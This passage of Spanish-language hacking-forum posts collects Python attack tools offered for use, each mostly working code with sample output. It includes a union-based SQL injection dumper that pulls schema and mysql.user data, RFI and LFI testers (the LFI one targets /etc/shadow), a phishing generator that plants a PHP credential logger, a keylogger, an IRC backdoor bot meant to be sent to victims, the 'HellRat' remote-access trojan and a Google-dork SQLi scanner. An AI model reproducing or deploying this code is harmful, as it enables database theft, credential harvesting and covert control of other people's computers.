  savefile("logs/"+gethost(web)+".txt","[DB] : "+table)
  print "[+] information_schema : ON"
  print "[+] Columns Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    column = re.findall("K0BRA(.*?)K0BRA",code2)
    column = column[0]
    savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
    print "[Column Found] : "+column

 else:
  print "[-] Not Found\n"


def showtablesdb(web,db,passx):
 db = "0x"+str(binascii.hexlify(db))
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)	
 print "\n\n[+] Searching tables in DB\n\n"
 savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Tables Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    table = re.findall("K0BRA(.*?)K0BRA",code2)
    table = table[0]
    print "[Table Found] : "+table
    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
 else:
  print "[-] Not Found\n"



def showtables(web,passx):
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
 print "\n\n[+] Searching tables\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Tables Found : ",numbers,"\n"	
  for counter in range(17,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    table = re.findall("K0BRA(.*?)K0BRA",code2)
    table = table[0]
    print "[Table Found] : "+table
    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
 else:
  print "[-] Not Found\n"



def showcolumns(tabla,web,passx):
 pass1,pass2 = bypass(passx)
 tabla = "0x"+str(binascii.hexlify(tabla))
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
 print "\n\n[+] Searching tables\n\n"
 savefile("logs/"+gethost(web)+".txt","[Table Found] : "+tabla)
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Columns Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    column = re.findall("K0BRA(.*?)K0BRA",code2)
    column = column[0]
    print "[Column Found] : "+column
    savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
 else:
  print "[-] Not Found\n"




def showdbs(web,passx):
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
 print "\n\n[+] Searching DBS\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] DBS Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    db = re.findall("K0BRA(.*?)K0BRA",code2)
    db = db[0]
    print "[DB Found] : "+db
    savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
 else:
  print "[-] Not Found\n"




def menu(page,bypass):
 clean()
 header()
 print "\n[+] Target : ",page,"\n"
 print "\n[information_schema]\n\n"
 print "1 - Show tables\n"
 print "2 - Show columns of the a table\n"
 print "3 - Show databases\n"
 print "4 - Show tables from the a DB\n"
 print "5 - Show columns from the a table of the DB\n"
 print "\n[mysql.user]\n\n"
 print "6 - Show users\n"
 print "\n[Others]\n\n"
 print "7 - Show details\n"
 print "8 - Dump data\n"
 print "9 - Show log\n"
 print "10 - Change target\n"
 print "11 - Exit\n\n"
 try:
  op = input("[Option] : ")
  if op == 1: 
   showtables(page,bypass)
   raw_input()    
   menu(page,bypass)
  elif op == 2:
   table = raw_input("\n\n[Table] : ")
   showcolumns(table,page,bypass)
   raw_input() 
   menu(page,bypass)
  elif op == 3:
   showdbs(page,bypass)
   raw_input() 
   menu(page,bypass)
  elif op == 4:
   db = raw_input("\n\n[DB] : ")
   showtablesdb(page,db,bypass)
   raw_input()
   menu(page,bypass)
  elif op == 5:
   db = raw_input("\n\n[DB] : ")
   table = raw_input("\n\n[Table] : ")
   showcolumnsdb(page,db,table,bypass)
   raw_input()
   menu(page,bypass)
  elif op == 6:
   mysqluser(page,bypass)
   raw_input()
   menu(page,bypass)
  elif op == 7:
   more(page,bypass)
   raw_input()
   menu(page,bypass)	
  elif op == 8:
   table = raw_input("\n\n[Table] : ")
   col1 = raw_input("\n\n[Column 1] : ")
   col2 = raw_input("\n\n[Column 2] : ")
   dumper(page,bypass,table,col1,col2)
   raw_input()
   menu(page,bypass)
  elif op == 9:
   os.system("start logs/"+gethost(page)+".txt")
   menu(page,bypass)
  elif op == 10:
   sta()
 except:
  menu(page,bypass)
 if op == 11:
  copyright()
  
 
def more(web,passx):
 pass1,pass2 = bypass(passx)
 print "\n[+] Searching more data\n"
 web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
 code0 = toma(web1+pass2)
 if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
  datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
  datar = re.split("K0BRA",datax[0])
  print "[+] Username :",datar[1]
  print "[+] Database :",datar[2]
  print "[+] Version :",datar[3],"\n"
  savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
  savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
  savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
 code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
 if (re.findall("K0BRA",code1)):
   print "[+] mysql.user : on" 
   savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
 code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
 if (re.findall("K0BRA",code2)):
   print "[+] information_schema.tables : on"
   savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")

def findlength(web,passx): 
 pass1,pass2 = bypass(passx) 
 print "\n[+] Finding columns length"
 number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
 for te in range(2,30):
  number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
  code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
  if (re.findall("K0BRA(.*?)K0BRA",code)):
   numbers = re.findall("K0BRA(.*?)K0BRA",code)	
   print "[+] Column length :",te
   print "[+] Numbers",numbers,"print data"
   sql = ""
   tex = te + 1
   for sqlix in range(2,tex):
    sql = str(sql)+","+str(sqlix)
    sqli  = str(1)+sql
   sqla = re.sub(numbers[0],"hackman",sqli)
   savefile("logs/"+gethost(web)+".txt","[Target] : "+web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla)
   menu(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)

 print "[-] Length dont found\n"
   
    
def scan(web,passx):
 pass1,pass2 = bypass(passx) 
 print "\n\n[+] Testing vulnerability"
 code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
 if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
  print "[+] SQLI Detected"
  findlength(web,passx)
 else:
  print "[-] Not Vulnerable"
  copyright()


def sta(): 

 clean()
 header()

 web = raw_input("\n\n[Page] : ")
 bypasx = raw_input("\n\n[Bypass] : ")
 scan(web,bypasx)

sta()

#The End

#372

Python / [Python] RFI Tester

Julio 03, 2011, 09:36:38 PM

Hola a todos.

Acabo de hacer un simple verificador de vulnerabilidad RFI

Código: python


#!usr/bin/python
#RFI Tester (C) Doddy Hackman

import os,sys,urllib2,re

def header() : 
 print "\n--== RFI Tester ==--\n"

def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 exit(1)

def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
 return urllib2.urlopen(web).read()

def test(web):
 try:
  print "\n[+] Testing vulnerability RFI in",web
  code = toma(web+"http://www.supertangas.com")
  if(re.findall("Los mejores TANGAS de la red",code,re.I)):
   print "[+] RFI Detected"
  else:
   print "[-] RFI Not Found" 
 except:
  pass

header()

if len(sys.argv) != 2 : 
 show()

else :
 test(sys.argv[1])

copyright()


#The End

Ejemplo de uso

Código: text


python rfi.py http://127.0.0.1/rfi.php?index=

Código: text


C:\Users\DoddyH\Desktop\Arsenal X parte 2>rfi.py http://127.0.0.1/rfi.php?index=

--== RFI Tester ==--


[+] Testing vulnerability RFI in http://127.0.0.1/rfi.php?index=
[+] RFI Detected

(C) Doddy Hackman 2010

#373

Python / [Python] Phising Gen By Doddy H

Julio 03, 2011, 09:36:25 PM

Hola a todos

Acabo de terminar esta tool en python para generar los fakes o phising (si es que asi se escribe)
No me dedico mucho a esa parte del hacking , pero hice esta cosa rara porque no
tenia nada que hacer xDD.

Código: python


#!usr/bin/python
#Phising Gen (C) Doddy Hackman

import urllib2,sys,os


def savefile(filename,text):
 file = open(filename,"w")
 file.write(text)
    

def header() : 
 print "\n\n--== Phising Gen ==--\n"

def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 exit(1)

def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web> <filename>\n"

def toma(web) :
 return urllib2.urlopen(web).read()


def gen(web,new):
 try:
  print "\n[+] Working in the phishing"
  code = toma(web) 
  text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>'
  print "[+] The fake was save in",new
  savefile(new,code+"\n\n"+text)
 except:
  pass

header()

if len(sys.argv) != 3 : 
 show()

else :
 gen(sys.argv[1],sys.argv[2])

copyright()

#The End

Ejemplo de uso

Código: text


C:/Users/DoddyH/Desktop/Arsenal X parte 2>phising.py http://127.0.0.1/login.php
yeah.php



--== Phising Gen ==--


[+] Working in the phishing
[+] The fake was save in yeah.php


(C) Doddy Hackman 2010

#374

Python / [Python] LFI T00l

Julio 03, 2011, 09:36:14 PM

Hola a todos.

Acabo de terminar una tool para testear una vulnerabilidad LFI , si la pagina
es vulnerable entonces el script automaticamente intenta brutear archivos.

Código: python


#!usr/bin/perl
#LFI T00l (C) Doddy Hackman

import os,sys,urllib2,re

files = ['../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']

def header() : 
 print "\n--== LFI T00l ==--\n"

def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 exit(1)

def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
 return urllib2.urlopen(web).read()


def fuzz(web):
 print "\n[+] Fuzzing files...\n"
 for file in files:
  code = toma(web+file)
  if not (re.findall("No such file or directory in",code)):
   print "[File Found] : ",web,file
  


def test(web):
 try:
  print "\n[+] Testing vulnerability LFI in",web
  code = toma(web+"'")
  if(re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)):
   fpd = re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)
   print "\n[+] LFI Detected"
   print "[+] Full Path discloure : ",fpd[0]
   fuzz(web)
  else:
   print "[-] LFI Not Found" 
 except:
  pass

header()

if len(sys.argv) != 2 : 
 show()

else :
 test(sys.argv[1])

copyright()


#The End

Ejemplo de uso

Código: text


python lfi.py http://127.0.0.1/lfi.php?file=

Código: text


C:\Users\DoddyH\Desktop\Arsenal X parte 2>lfi.py http://127.0.0.1/lfi.php?file=

--== LFI T00l ==--


[+] Testing vulnerability LFI in http://127.0.0.1/lfi.php?file=

[+] LFI Detected
[+] Full Path discloure :  C:\xampp\htdocs\lfi.php

[+] Fuzzing files...



(C) Doddy Hackman 2010

#375

Python / [Python] Simple Keylogger

Julio 03, 2011, 09:36:01 PM

Un simple keylogger en Python

Código: python


#!usr/bin/python
#Simple Keylogger in Python
#(C) Doddy Hackman 2011

import pyHook,pythoncom


def savefile(name,text):
 file = open(name,"a")
 file.write(text+"\n")
 file.close()

def toma(frase):
 savefile("logs.txt",frase.Key)

def capturar():
 nave = pyHook.HookManager()
 nave.KeyDown = toma
 nave.HookKeyboard()
 pythoncom.PumpMessages()

while 1:
 capturar()

# The End

#376

Python / [Python] IRC Bot

Julio 03, 2011, 09:35:50 PM

Hola a todos.

Aca les traigo un IRC Bot en Python para poder usar como servidor oculto y mandarselo
a una victima para poder controlarla desde un comando canal IRC

El comando clave para mandar comandos que despues se muestra el
resultado de comando en el chat es

Código: python


cmdnow TUCOMANDO

Código: python


#!usr/bin/python
#Insane Bot (C) Doddy Hackman 2011
#Version beta 0.00001

import re,socket
import subprocess

host = "127.0.0.1"
canal = "#locos"
nick = "bot"

irc = socket.socket()	
try:
 irc.connect((host,6667))
 irc.send("NICK "+nick+"\r\n")
 irc.send("USER "+nick+" 1 1 1 1\r\n")
 irc.send("JOIN "+canal+"\r\n")
 print "[+] Insane Bot Online\n"
 while 1:
  code = irc.recv(9999)
  if re.findall("PING",code):
   irc.send("PONG "+code.split()[1]+"\r\n")
  if re.findall("PRIVMSG",code):
   nick = code.split("!")
   nick = nick[0].replace(":","")
   msg = code.split(":")[2:][0]
   if re.findall("cmdnow",code):
    cmd = code.split("cmdnow")[1]
    irc.send("PRIVMSG "+canal+" : [+] Loading command : "+cmd+"\n")
    rea = subprocess.Popen(cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
    if rea:
     re1 = rea.stdout.read()
     total = re1.replace("\n","|") 
     irc.send("PRIVMSG "+canal+" : "+total+"\n")
    else:
     re2 = rea.stderr.read()
     total = re2.replace("\n","|")
     irc.send("PRIVMSG "+canal+" : "+total+"\n")
    
   
except:
 print "\n\n[-] Error\n\n"


# The End

#377

Python / [Python] HTTP Console By Doddy H

Julio 03, 2011, 09:35:32 PM

Bueno , este es un simple programa en python hecho en tk que permite mandar
peticiones webs a un servidor en concreto

Código: python


#!usr/bin/python
#Console (C) Doddy Hackman 2011

from Tkinter import *
import socket

global x,socket

def execa() :


 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((str(host.get()),80))
 s.send(cmd.get()+"\r\n")
 data = s.recv(666)
 s.close()
 panel.insert(END,repr(data))

   
 
window = Tk()
window.title("HTTP Console (C) Doddy Hackman 2011")

window.maxsize(width="400",height="350")
window.minsize(width="400",height="350")

window.configure(background="black")
window.configure(cursor="tcross")

host = StringVar()
cmd = StringVar()

panel = Text(window,width=30,height=15,bg="black",fg="red")

Label(window,bg="black").grid(row=3)

Label(window,text="Host : ",bg="black",fg="red").grid(row=4,column=4)
entry = Entry(window,width=35,textvariable=host,bg="black",fg="red").grid(row=4,column=5)

Label(window,text="Command : ",bg="black",fg="red").grid(row=8,column=4)
entry = Entry(window,width=35,textvariable=cmd,bg="black",fg="red").grid(row=8,column=5)

Button(text="Cargar",bg="black",fg="red",activebackground="red",command=execa).grid(row=8,column=9)


Label(window,bg="black").grid(row=19)
panel.grid(row=20,column=5)	


window.mainloop()

#378

Python / [Python] HellRat By Doddy H

Julio 03, 2011, 09:35:15 PM

Hola , aca traigo un troyano en python con las siguientes
opciones

Ocultar inicio
Mostrar inicio
Ocultar barra de tereas
Mostrar barra de tareas
Abrir CD
Cerrar CD
Ejecutar comandos

Mostrar informacion

server.py

Código: python


#!usr/bin/python
#Hell RAt (C) Doddy Hackman 2011

import socket,os,re,win32api,win32gui,win32con,ctypes,subprocess

print "\n\n[+] Online\n\n"

slave = socket.socket()
slave.bind(("",666))
slave.listen(999)

a,b = slave.accept()

while True:
 rex = a.recv(20)
 if re.findall("getso",rex):
  z = os.name
  a.send(z)
 if re.findall("getpath",rex):
  h = os.getcwd()
  a.send(h)
 if re.findall("ocultarinicio",rex): 
  x = win32gui.FindWindow("Shell_TrayWnd","")
  win32gui.ShowWindow(x,win32con.SW_HIDE)
 elif re.findall("mostrarinicio",rex):
  x = win32gui.FindWindow("Shell_TrayWnd","")
  win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
 elif re.findall("ocultaricono",rex):
  x = win32gui.FindWindow(0,"Program Manager")
  win32gui.ShowWindow(x,win32con.SW_HIDE)
 elif re.findall("mostraricono",rex):
  x = win32gui.FindWindow(0,"Program Manager")
  win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
 elif re.findall("abrircd",rex):
  ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door open", None, 0, None)
 elif re.findall("cerrarcd",rex):
  ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door closed", None, 0, None)
 else: 
  rea = subprocess.Popen(rex,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
  if re:
   a.send(rea.stdout.read())
  else:
   a.send(rea.stderr.read())
 

# The End

cliente.py

Código: python


#!usr/bin/python 
#HellRat (C) Doddy Hackman 2011

import os,socket,sys

def head(): 
 print "\n\n-- == hELLrAT == --\n\n"

def copyright():
 print "\n\n(C) Doddy Hackman 2011\n\n"

def clean():
 if sys.platform=="win32":
  os.system("cls")
 else:
  os.system("clear")

def men():

 try:
  ip = raw_input("[+] IP : ")	
  client = socket.socket()		
  client.connect((ip,666))
  while True: 
   clean()
   print "\n\n[+] Welcome to ",ip,"\n\n"
   print "\n\n[1] Informacion"
   print "[2] CMD"
   print "[3] Abrir CD"
   print "[4] Cerrar CD"
   print "[5] Ocultar iconos"
   print "[6] Mostrar iconos"
   print "[7] Ocultar barra de tareas"
   print "[8] Mostrar barra de tareas"
   print "[9] Cambiar IP"
   print "[10] Salir"
   op = input("\n\n[Opcion] : ")
   if op == 1:
    print "\n\n[+] Informacion\n\n"
    client.send("getso")
    so = client.recv(999)
    client.send("getpath")
    path = client.recv(999)
    print "[+] SO : "+so  
    print "[+] Path : "+path
    raw_input()
   if op == 2: 
    cmd = raw_input("\n[CMD] : ")
    client.send(cmd)
    code = client.recv(999)
    print code
    raw_input()
   if op == 3:
    client.send("abrircd")
   if op == 4:
    client.send("cerrarcd") 
   if op == 5:
    client.send("ocultaricono")
   if op == 6:
    client.send("mostraricono")
   if op == 7:
    client.send("ocultarinicio")
   if op == 8:
    client.send("mostrarinicio")
   if op == 9:
    men()
   if op == 10:
    client.close()
    copyright()
    raw_input()
    sys.exit(1)
 except:
  print "\n\n[-] Error\n\n"
head()
men() 

# The End

#379

Python / [Python] Google Inyector By dODDY h

Julio 03, 2011, 09:34:58 PM

Bueno , acabo de hacer un scanner de sqli.

Este busca en google paginas con un dork marcado por ustedes
, para despues borrar repetidos y scanear las webs encontradas

Código: python


#!usr/bin/python
#Google Iny (C) Doddy Hackman 2011


import urllib2,re,os,sys


def head():
 print "\n\n -- == Google Iny == --\n"

def copyright(): 
 print "\n(C) Doddy Hackman 2011\n"
 sys.exit(1)


def toma(web) :
 nave = urllib2.Request(web)
 nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
 op = urllib2.build_opener()
 return op.open(nave).read()


def show():
 print "\n[+] Sintax : ",sys.argv[0]," <dork> <count>\n"

def limpiar(pag):

 limpia = []
 for p in pag:
  if not (re.findall("http://www.google.com.ar",p,re.I)):
   if p not in limpia:
    limpia.append(p)
 return limpia


def sql(webs):
 for web in webs :
  if re.findall("=",web): 
   web = re.split("=",web)
   web = web[0]+"="
   try:
    code = toma(web+"-1+union+select+1--")
    if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
     print "[SQLI] : ",web,"\n"
   except:
    pass

def scan(dork,count): 
 pag = []
 s = 10  
 while s <= int(count):
  try:
   code = toma("http://www.google.com.ar/search?hl=&q="+str(dork)+"&start="+repr(s))
   d = re.findall("(?<=\"r\"><. href=\")[^\"]+",code)
   s += 10
   for a in d:
    pag.append(a)
  except:
   copyright()
 pag = limpiar(pag)

 return pag

head()
 
if len(sys.argv) != 3:
 show()
else :
 print "\n[+] SQL Scan Started\n"
 print "[+] Dork : ",sys.argv[1]
 print "[+] Count : ",sys.argv[2]
 pages = scan(sys.argv[1],sys.argv[2])
 print "\n[+] Webs Found : ",len(pages),"\n"
 sql(pages)

copyright()

#380

Python / [Python] Fuzz DNS By Doddy H

Julio 03, 2011, 09:34:47 PM

Hola a todos.

Aca les dejo un simple buscador de dns , solo ponen el dominio y esta cosita se encarga de buscarlas.

Código: python


#!usr/bin/python
#LFI T00l (C) Doddy Hackman

import os,sys,urllib2,re

dns = ['www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc']

def header() : 
 print "\n--== Fuzz DNS ==--\n"

def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 exit(1)

def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
 return urllib2.urlopen(web).read()


def search(web):
 print "\n[+] Searching DNS in",web,"\n"
 try:
  for d in dns:
   toma("http://"+d+"."+web)
   print "[DNS Link] : http://"+d+"."+web 
 except:
  pass

header()

if len(sys.argv) != 2 : 
 show()

else :
 search(sys.argv[1])

copyright()


#The End

Ejemplo de uso

Código: text


C:/Users/dODDYh/Desktop/Arsenal X parte 2>fuzzdns.py google.com


--== Fuzz DNS ==--


[+] Searching DNS in google.com

[DNS Link] : http://www.google.com 

(C) Doddy Hackman 2010

#381

Python / [Python] FTP Manager

Julio 03, 2011, 09:34:36 PM

Hola

Aca traigo un simple cliente FTP

Código: python


#!usr/bin/python
#FTP Manager 0.2 (C) Doddy Hackman 20111

from ftplib import FTP
import sys


def head():
 print "\n -- == FTP Manger == --\n\n"

def copyright():
 print "\n\n(C) Doddy Hackman 2011\n"
 sys.exit(1)

def show():
 print "\nSintax : "+sys.argv[0]+" <host> <user> <pass>\n"

def menu():
 print "\n"
 print "1 : dir"
 print "2 : cwd"
 print "3 : chdir"
 print "4 : delete dir"
 print "5 : delete file"
 print "6 : rename file"
 print "7 : make directory"
 print "8 : size"
 print "9 : abort\n\n"
 op = input("[Option] : ")
 return op


def enter(host,user,password):	
 print "[+] Connecting to ",host,"\n"
 enter = FTP(host,user,password)
 print "\n[+] Enter in the system\n"

 def menu2():
  op = menu()
  if op == 1:
   try:
    lista = enter.dir()
    for a in lista:
     print a
    menu2()
   except:
    menu2()
  elif op == 2:
   try:
    print "\n\n[+] Path : "+enter.pwd()+"\n\n"
    menu2() 
   except:
    menu2()
  elif op == 3:
   try:
    dir = raw_input("\n\n[Directory] : ")
    enter.cwd(dir)
    print "\n\n[+] Directory Changed\n\n"
    menu2()
   except:
    menu2()
  elif op == 4:
   try:
    dir = raw_input("\n\n[Directory] : ")
    enter.rmd(dir)
    print "\n\n[+] Directory Deleted\n\n"
    menu2()
   except:
    menu2()
  elif op == 5:
   try:
    file = raw_input("\n\n[File] : ")
    enter.delete(file)
    print "\n\n[+] File Deleted\n\n"
    menu2()
   except:
    menu2()
  elif op == 6:
   try:
    oldfile = raw_input("\n\n[Name] : ")
    newfile = raw_input("\n[New Name] : ")
    enter.rename(oldfile,newfile) 
    print "\n\n[+] Name Changed\n\n"
    menu2()
   except:
    menu2()
  elif op == 7:
   try:
    dir = raw_input("\n\n[New Directory] : ")
    enter.mkd(dir)
    print "\n\n[+] Directory Created\n\n"
    menu2()
   except:
    menu2()
  elif op == 8:
   try:
    file = raw_input("\n\n[File] : ")
    peso = enter.size(file)
    print "\n\n[+] ",peso," KB \n\n"
    menu2()
   except:
    menu2()
  elif op == 9:
